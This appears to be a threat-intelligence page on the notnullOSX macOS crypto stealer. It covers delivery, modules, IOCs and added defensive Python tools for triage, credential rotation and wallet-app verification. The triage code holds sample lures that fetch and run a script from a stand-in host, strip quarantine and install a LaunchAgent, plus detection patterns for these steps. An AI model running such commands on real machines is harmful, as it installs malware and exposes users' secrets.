notnullOSX
notnullOSX is a Go-written macOS information-stealing malware family first reported in early 2026 and observed by Moonlock Lab on March 30, 2026. It is designed primarily to steal cryptocurrency and selectively targets Mac users whose wallets reportedly hold more than $10,000. Reported victim geography at first detection included Vietnam, Taiwan, and Spain. The malware has been linked in reporting to the underground actor 0xFFF, later using the alias alh1mik.
Distribution relies on social engineering rather than an exploit chain. Reported infection paths include ClickFix-style lures that trick victims into pasting a base64-encoded Terminal command (which decodes to a curl command that fetches a bash installer), fake protected Google Docs claiming an outdated Google API Connector or encryption issue, and malicious DMG installers masquerading as a WallSpace wallpaper application and promoted via a hijacked YouTube channel. The installer retrieves a Mach-O payload, strips the com.apple.quarantine extended attribute so Gatekeeper never assesses it, creates persistence via a LaunchAgent, and walks the victim through granting Full Disk Access. That grant is a legitimate TCC consent rather than a bypass of TCC: once given, the implant can read iMessage, Apple Notes, Safari and other TCC-protected data without further prompts, so an unfamiliar app asking for Full Disk Access right after an install is itself the warning sign.
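The stage-1 chain described above (a base64-encoded Terminal command, a curl fetch of a bash installer that is itself base64 text, quarantine removal, a LaunchAgent) is what an analyst usually has to triage from three artefacts: a pasted command, a fetched script body, or a plist in ~/Library/LaunchAgents. The helper below is an added example written for this page, not code from the original page or from any of the cited reports. The lure command, installer body, the domain lure.example and the LaunchAgent label are constructed placeholders, not the real indicators; the detection patterns are my reading of the behaviours the reporting names.

```python
"""Triage helpers for the notnullOSX-style infection chain described above.

Added example; not code from the original page or from any vendor write-up.
The lure command, installer body and LaunchAgent plist are constructed to
mimic the reported behaviour. Domains and labels are placeholders.
"""
import base64
import binascii
import plistlib
import re

# Installer behaviours named in the reporting, as regexes over a command line
# or script body. Each hit is recorded with the base64 layer it was found in.
SUSPICIOUS_PATTERNS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b[^|;\n]*https?://"),
    "pipe_to_shell": re.compile(r"\|\s*(ba)?sh\b|\b(ba)?sh\s+-c\b"),
    "nested_base64": re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
    "quarantine_removal": re.compile(r"\bxattr\s+-\w*[dc]\w*"),
    "launchagent_persist": re.compile(r"Library/LaunchAgents|launchctl\s+(load|bootstrap)\b"),
    "tmp_staging": re.compile(r"/(private/)?tmp/|\$TMPDIR|/var/folders/"),
}
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def _decode_text(blob):
    """Decode a base64 blob to text, or None if it is not base64 or not text."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    if not all(c.isprintable() or c in "\r\n\t" for c in text):
        return None
    return text


def unwrap_layers(command, max_depth=5):
    """Peel nested base64 (echo X | base64 -d | bash, base64 script bodies).

    Returns the layers outermost first; layer 0 is the text as given.
    """
    layers = [command]
    for _ in range(max_depth):
        decoded = next((t for t in map(_decode_text, B64_BLOB.findall(layers[-1])) if t), None)
        if decoded is None:
            break
        layers.append(decoded)
    return layers


def triage_command(command):
    """Score a pasted Terminal command or a fetched script body."""
    layers = unwrap_layers(command)
    hits = {}
    for depth, layer in enumerate(layers):
        for name, pat in SUSPICIOUS_PATTERNS.items():
            if name not in hits and pat.search(layer):
                hits[name] = depth  # first layer in which the behaviour appeared
    return {"layers": len(layers), "hits": hits, "suspicious": len(hits) >= 2}


def triage_launch_agent(plist_bytes):
    """Flag LaunchAgent properties typical of dropped persistence."""
    plist = plistlib.loads(plist_bytes)
    args = plist.get("ProgramArguments") or [plist.get("Program", "")]
    program = str(args[0])
    findings = []
    if re.search(r"^/(private/)?tmp/|^/var/folders/|^/Users/", program):
        findings.append("program in user-writable location")
    if re.search(r"/\.[^/]+/", program):
        findings.append("program under a hidden directory")
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        findings.append("RunAtLoad + KeepAlive (restart on exit)")
    for name, pat in SUSPICIOUS_PATTERNS.items():
        if pat.search(" ".join(map(str, args))):
            findings.append("arguments match " + name)
    return {"label": plist.get("Label"), "program": program, "findings": findings}


# Constructed samples (placeholders, not the real lure, Install.sh or plist).
STAGE1_CMD = "curl -fsSL https://lure.example/install.sh | bash"
SAMPLE_LURE = "echo %s | base64 -d | bash" % base64.b64encode(STAGE1_CMD.encode()).decode()
INSTALLER_BODY = """#!/bin/bash
curl -fsSL https://lure.example/payload -o "$HOME/.cache/.wallpaperhelper"
xattr -d com.apple.quarantine "$HOME/.cache/.wallpaperhelper"
chmod +x "$HOME/.cache/.wallpaperhelper"
launchctl load "$HOME/Library/LaunchAgents/com.example.wallpaperhelper.plist"
"""
SAMPLE_INSTALLER = base64.b64encode(INSTALLER_BODY.encode()).decode()
SAMPLE_LAUNCH_AGENT = plistlib.dumps({
    "Label": "com.example.wallpaperhelper",
    "ProgramArguments": ["/Users/victim/.cache/.wallpaperhelper", "--daemon"],
    "RunAtLoad": True,
    "KeepAlive": True,
})

if __name__ == "__main__":
    print("lure", triage_command(SAMPLE_LURE))
    print("installer", triage_command(SAMPLE_INSTALLER))
    print("launchagent", triage_launch_agent(SAMPLE_LAUNCH_AGENT))
```

The depth recorded for each hit is the useful part: a `remote_fetch` that only appears at depth 1 or deeper means the download was hidden behind base64, which is the ClickFix signature. Feed `triage_launch_agent` the bytes of each file in ~/Library/LaunchAgents to sweep a host.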
The malware is modular and has been described as both a stealer and a backdoor because it maintains persistent command-and-control and can receive follow-on instructions. Reported modules include SystemInfo, iMessageGrab, AppleNotesGrab, SafariCookiesGrab, CryptoWalletsGrab, BrowserHistoryGrab, BrowserGrab, FirefoxGrab, CredsGrab, TelegramGrab, and ReplaceApp. Confirmed theft targets mentioned in reporting include iMessages, Apple Notes, Safari cookies, browser passwords and history, Telegram Desktop session data, cryptocurrency wallet data, and developer secrets such as SSH keys, cloud credentials, Kubernetes configs, Docker configs, Terraform credentials, package manager tokens, and shell profiles. CryptoWalletsGrab reportedly targets desktop wallets including Bitcoin Core, Electrum, Wasabi, Exodus, and Atomic, as well as numerous browser wallet extensions.
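Because CredsGrab sweeps developer secrets, the first incident-response question on a suspected host is not "what did it steal" but "what now has to be rotated". The inventory below is an added example written for this page, not code from the page or from any vendor. It lists the secret stores the reporting names, at the standard locations each tool uses (my assumption; the reporting names categories, not paths), and pulls out the named credentials that are cheap to parse: SSH private key files, AWS profiles and their access key IDs, Docker registries with stored logins, npm registries with an _authToken, and secret-looking exports in shell profiles. The sample home directory is constructed in a temp dir with placeholder values.

```python
"""Exposure inventory for the CredsGrab targets listed above.

Added example; not code from the page or from any vendor. File locations are
the standard ones for each tool (assumption). The sample home directory is
constructed with placeholder values, not real secrets.
"""
import configparser
import json
import re
import tempfile
from pathlib import Path

# Secret stores named in the reporting, at their usual locations under $HOME.
STORE_PATHS = {
    "ssh": ".ssh",
    "aws": ".aws/credentials",
    "gcloud": ".config/gcloud",
    "azure": ".azure",
    "kubernetes": ".kube/config",
    "docker": ".docker/config.json",
    "terraform": ".terraform.d/credentials.tfrc.json",
    "npm": ".npmrc",
    "pypi": ".pypirc",
}
SHELL_PROFILES = [".zshrc", ".zprofile", ".bashrc", ".bash_profile", ".profile"]
NPM_TOKEN_LINE = re.compile(r"^\s*//([^/\s]+)\S*?:_authToken\s*=", re.M)
SECRET_EXPORT = re.compile(
    r"^\s*export\s+([A-Z0-9_]*(?:TOKEN|KEY|SECRET|PASSWORD|PASS)[A-Z0-9_]*)\s*=", re.M)


def ssh_private_keys(home):
    """Private key files in ~/.ssh, identified by their PEM/OpenSSH header."""
    ssh_dir = home / ".ssh"
    if not ssh_dir.is_dir():
        return []
    keys = []
    for f in sorted(ssh_dir.iterdir()):
        head = f.read_text(errors="ignore")[:64] if f.is_file() else ""
        if head.startswith("-----BEGIN") and "PRIVATE KEY" in head:
            keys.append(f.name)
    return keys


def aws_profiles(home):
    """(profile, access key id) pairs from ~/.aws/credentials.

    Access key IDs are the handles you revoke; they are not themselves secret.
    """
    path = home / STORE_PATHS["aws"]
    if not path.is_file():
        return []
    cp = configparser.ConfigParser()
    cp.read(path)
    return [(s, cp[s].get("aws_access_key_id", "")) for s in cp.sections()]


def docker_registries(home):
    """Registries with stored logins in ~/.docker/config.json."""
    path = home / STORE_PATHS["docker"]
    if not path.is_file():
        return []
    try:
        return sorted(json.loads(path.read_text()).get("auths", {}))
    except ValueError:
        return []


def npm_registries(home):
    """Registry hosts that have an _authToken line in ~/.npmrc."""
    path = home / STORE_PATHS["npm"]
    return NPM_TOKEN_LINE.findall(path.read_text()) if path.is_file() else []


def shell_profile_secrets(home):
    """Exported variables that look like secrets, per shell profile file."""
    out = {}
    for name in SHELL_PROFILES:
        path = home / name
        if path.is_file():
            found = SECRET_EXPORT.findall(path.read_text(errors="ignore"))
            if found:
                out[name] = found
    return out


def inventory(home):
    """Everything in this home directory that CredsGrab-style theft exposes."""
    home = Path(home)
    return {
        "present": {k: (home / v).exists() for k, v in STORE_PATHS.items()},
        "ssh_keys": ssh_private_keys(home),
        "aws": aws_profiles(home),
        "docker": docker_registries(home),
        "npm": npm_registries(home),
        "shell_profiles": shell_profile_secrets(home),
    }


def build_sample_home():
    """Constructed victim home directory; every value is a placeholder."""
    home = Path(tempfile.mkdtemp(prefix="victim-home-"))
    for d in (".ssh", ".aws", ".docker", ".kube"):
        (home / d).mkdir()
    (home / ".ssh" / "id_ed25519").write_text(
        "-----BEGIN OPENSSH PRIVATE KEY-----\nPLACEHOLDER\n-----END OPENSSH PRIVATE KEY-----\n")
    (home / ".ssh" / "id_ed25519.pub").write_text("ssh-ed25519 AAAAC3 user@host\n")
    (home / ".aws" / "credentials").write_text(  # key ids are AWS's documentation examples
        "[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = PLACEHOLDER\n\n"
        "[prod]\naws_access_key_id = AKIAI44QH8DHBEXAMPLE\naws_secret_access_key = PLACEHOLDER\n")
    (home / ".docker" / "config.json").write_text(json.dumps({"auths": {"ghcr.io": {"auth": "PLACEHOLDER"}}}))
    (home / ".npmrc").write_text("//registry.npmjs.org/:_authToken=PLACEHOLDER\n")
    (home / ".kube" / "config").write_text("apiVersion: v1\nkind: Config\n")
    (home / ".zshrc").write_text("export PATH=$HOME/bin:$PATH\nexport GITHUB_TOKEN=PLACEHOLDER\n")
    return home


if __name__ == "__main__":
    print(inventory(build_sample_home()))
```

Run `inventory(Path.home())` on the affected machine (or on a collected home directory) and treat every item returned as compromised: revoke the listed AWS key IDs, rotate registry and npm tokens, replace the SSH keys and remove their public halves from authorized_keys and Git hosting, and re-issue whatever the kube and cloud configs point at.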
A notable capability is the ReplaceApp module, which reportedly replaces the legitimate desktop companion apps for hardware wallets, such as Ledger Live and Trezor, with trojanized or counterfeit versions so that seed phrases typed during setup or use are captured. The hardware device itself is not attacked; the victim is induced to type the recovery phrase into a fake app. No genuine wallet-management app needs the recovery phrase for normal operation, so any app prompting for it outside a deliberate device-recovery flow should be treated as compromised. Reporting also states that notnullOSX keeps a persistent connection to attacker infrastructure, including a Firebase Realtime Database instance used for C2 (described in one write-up as a WebSocket connection), and downloads additional modules from cdn.filestackcontent.com.
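The practical counter to ReplaceApp is to verify that the wallet app on disk is still the vendor's build. The checker below is an added example written for this page, not code from the page or from Ledger or Trezor. It looks for what a counterfeit copy dropped by a stealer tends to get wrong: a bundle identifier other than the one you recorded from a known-good install, a main executable that is not a Mach-O file (a script or wrapper), a missing _CodeSignature directory and, when macOS's `codesign` tool is available, a failing signature verification or a Team ID other than the expected one. The expected bundle ID and Team ID are operator-supplied assumptions (record them from a clean install; none are stated on this page), and the sample bundles are constructed in a temp dir.

```python
"""Integrity check for the wallet apps ReplaceApp is reported to swap out.

Added example; not code from the page or from any wallet vendor. Expected
bundle and team identifiers are supplied by the operator from a known-good
install. Sample bundles are constructed in a temp dir.
"""
import plistlib
import shutil
import subprocess
import tempfile
from pathlib import Path

# Mach-O and universal-binary magic numbers, both byte orders.
MACHO_MAGICS = {b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",   # 32-bit
                b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",   # 64-bit
                b"\xca\xfe\xba\xbe", b"\xbe\xba\xfe\xca"}   # fat / universal


def _codesign_findings(app, expected_team_id):
    """Signature verification via codesign (macOS only); empty list if clean."""
    verify = subprocess.run(["codesign", "--verify", "--deep", "--strict", str(app)],
                            capture_output=True, text=True)
    if verify.returncode != 0:
        return ["codesign-failed: " + verify.stderr.strip()]
    if not expected_team_id:
        return []
    info = subprocess.run(["codesign", "-dv", "--verbose=4", str(app)],
                          capture_output=True, text=True)
    team = next((line.split("=", 1)[1] for line in info.stderr.splitlines()
                 if line.startswith("TeamIdentifier=")), "")
    if team != expected_team_id:
        return [f"team-id-mismatch: {team!r} != {expected_team_id!r}"]
    return []


def check_app_bundle(app, expected_bundle_id, expected_team_id=None):
    """Structural checks that run anywhere, plus codesign where it exists."""
    app = Path(app)
    findings = []
    info_path = app / "Contents" / "Info.plist"
    if not info_path.is_file():
        return {"bundle_id": "", "findings": ["missing-info-plist"], "signature_checked": False}
    info = plistlib.loads(info_path.read_bytes())
    bundle_id = info.get("CFBundleIdentifier", "")
    if bundle_id != expected_bundle_id:
        findings.append(f"bundle-id-mismatch: {bundle_id!r} != {expected_bundle_id!r}")
    exe = app / "Contents" / "MacOS" / info.get("CFBundleExecutable", "")
    if not exe.is_file():
        findings.append("missing-executable: " + str(exe))
    elif exe.read_bytes()[:4] not in MACHO_MAGICS:
        findings.append("not-macho: magic " + exe.read_bytes()[:4].hex())
    if not (app / "Contents" / "_CodeSignature" / "CodeResources").is_file():
        findings.append("unsigned: no _CodeSignature/CodeResources")
    have_codesign = shutil.which("codesign") is not None
    if have_codesign:
        findings.extend(_codesign_findings(app, expected_team_id))
    return {"bundle_id": bundle_id, "findings": findings, "signature_checked": have_codesign}


def build_sample_bundle(bundle_id, signed, macho):
    """Constructed .app skeleton; not real wallet software."""
    app = Path(tempfile.mkdtemp(prefix="sample-")) / "Wallet.app"
    (app / "Contents" / "MacOS").mkdir(parents=True)
    (app / "Contents" / "Info.plist").write_bytes(plistlib.dumps(
        {"CFBundleIdentifier": bundle_id, "CFBundleExecutable": "Wallet"}))
    # A counterfeit is often a script or wrapper rather than a signed Mach-O.
    body = (b"\xcf\xfa\xed\xfe" + b"\0" * 28) if macho else b"#!/bin/sh\nexit 0\n"
    (app / "Contents" / "MacOS" / "Wallet").write_bytes(body)
    if signed:
        (app / "Contents" / "_CodeSignature").mkdir()
        (app / "Contents" / "_CodeSignature" / "CodeResources").write_text("<plist/>")
    return app


if __name__ == "__main__":
    # On a real host: check_app_bundle("/Applications/Ledger Live.app", RECORDED_ID, RECORDED_TEAM)
    clone = build_sample_bundle("com.example.walletclone", signed=False, macho=False)
    print(check_app_bundle(clone, "com.example.wallet"))
```

Off macOS only the structural checks run (`signature_checked` is False), which still catches the crude swaps; on macOS a failing `codesign --verify --deep --strict` or a foreign Team ID is conclusive even when the bundle looks structurally intact.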
High-confidence indicators and infrastructure mentioned in the reporting: the main Mach-O binary has SHA256 b0cd860f18b0136e063d7ef9a3c84d138a1a21dbea019605ce66a3a1fad91db4, a stage-1 bash installer has SHA256 070402c2c531aa3a87b9ccd080532a51d17b01d982b205fc4487246d58de8913, and a malicious DMG has SHA256 636fa90aebab98534dcdbe50508ed8d3607c284c72f831a4503e223540d3f761. Network infrastructure includes the IPs 111.90.149.111:8080 and 83.217.209.88, the domains wallpapermacos.com, wallspaceapp.com and mactest-6b2ab-default-rtdb.firebaseio.com, and the lure video at https://www.youtube.com/watch?v=nbH5KJGYBHk. Modules are fetched from cdn.filestackcontent.com, which is the shared CDN of a legitimate file-hosting service: treat it as a hunting pivot (downloads of Mach-O or base64 content from it by an unexpected process) rather than a block-list entry, since blocking it breaks legitimate sites. Likewise, firebaseio.com hosts many legitimate apps, so match the full mactest-6b2ab-default-rtdb hostname rather than the parent domain. At time of publication, detection coverage was limited: 10 of 64 VirusTotal vendors flagged the main sample.
Groups observed using it
2 distinct threat actors attributed by public researchers.
Attacks with the nascent notnullOSX malware for macOS have been targeting cryptocurrency wallets containing over $10,000 in Taiwan, Vietnam, and Spain as part of a ClickFix campaign identified on Mar. 30... Multiple modules are then deployed by notnullOSX, the most concerning of which is ReplaceApp, which replaces the Trezor or Ledger Live hardware wallets with counterfeit iterations to facilitate real-time exfiltration of secret seed phrases.
Techniques & procedures
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques
Traffic to the malicious site was driven by a hijacked YouTube channel registered back in 2015 that had accumulated 50,000 views within two weeks of posting a single video.
Execution
5 techniques
The base64-encoded command shown to the victim decodes into a curl command that fetches a bash installer script from a remote server.
One path, called ClickFix, presents a Terminal command that, when pasted and run, silently downloads and installs the malware.
The second delivers a malicious DMG disk image containing a README, an install script, and a Terminal shortcut, packaged to look entirely routine.
Persistence
2 techniques
Privilege Escalation
3 techniques
Stealth
4 techniques
The command presented by notnullOSX lures is base64-encoded ... Install.sh itself does not look like a script. At 299 KB, it presents as base64-encoded text.
The second path uses a fake disk image file called WallSpace.app, disguised as a legitimate macOS live wallpaper application.
Before a victim is approached, operators manually fill out a submission form identifying the target’s wallet address, social media profiles, and wallet balance. The panel documentation explicitly states the minimum threshold is $10,000, and submissions below that amount are simply not processed.
Defense Impairment
1 technique
Credential Access
5 techniques
This allows hackers to steal secret seed phrases as the user types them.
Once installed, notnullOSX operates silently and persistently, extracting data from iMessages, Apple Notes, Safari cookies, browser passwords, Telegram sessions, and a wide range of cryptocurrency wallets.
CredsGrab ... sweeps the home directory for SSH keys, cloud provider credentials, shell configs, package manager tokens, and DevOps tooling secrets
Discovery
2 techniques
Dynamic analysis reveals the following confirmed modules executing in sequence: SystemInfo ...
Collection
2 techniques
Command and Control
3 techniques
The implant also maintains a live connection back to the attacker’s server, meaning operators can send fresh instructions to infected machines long after the initial compromise.
Exfiltration
1 technique
IOCs tracked for this family
17 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
5 sources tracked across advisories, community write-ups, and news.
A Go-written macOS stealer delivered via social engineering, fake Google documents, a fake WallSpace wallpaper app, and a hijacked YouTube channel. It steals iMessages, Apple Notes, Safari cookies, browser passwords, Telegram sessions, and cryptocurrency wallet data, and includes a ReplaceApp module that swaps legitimate wallet apps such as Ledger Live with malicious clones to capture seed phrases. It also establishes persistence via LaunchAgent and maintains live C2 connectivity.
A macOS malware used in a ClickFix campaign to target high-value cryptocurrency wallets. It is downloaded after victims are lured into executing a command in Terminal, gains total disk access, deploys multiple modules, and can replace Trezor or Ledger Live wallet applications with counterfeit versions to steal seed phrases in real time.
A targeted macOS information stealer written in Go that focuses on cryptocurrency holders. It uses ClickFix social engineering and malicious DMG installers, coerces victims into granting Full Disk Access to bypass TCC protections, downloads modular payloads to steal messages, notes, browser data, Telegram data, credentials, and crypto wallet information, can replace legitimate wallet apps with trojanized versions, and maintains a persistent WebSocket connection to a Firebase-hosted C2 for remote commands.
A macOS malware platform designed to steal cryptocurrency by targeting high-value victims, using social engineering and fake applications to gain execution, requesting Full Disk Access to read sensitive data such as iMessages, Apple Notes, and Safari credentials, maintaining backdoor access for follow-on commands, and replacing legitimate wallet-management apps like Ledger Live and Trezor with trojanized versions to capture seed phrases.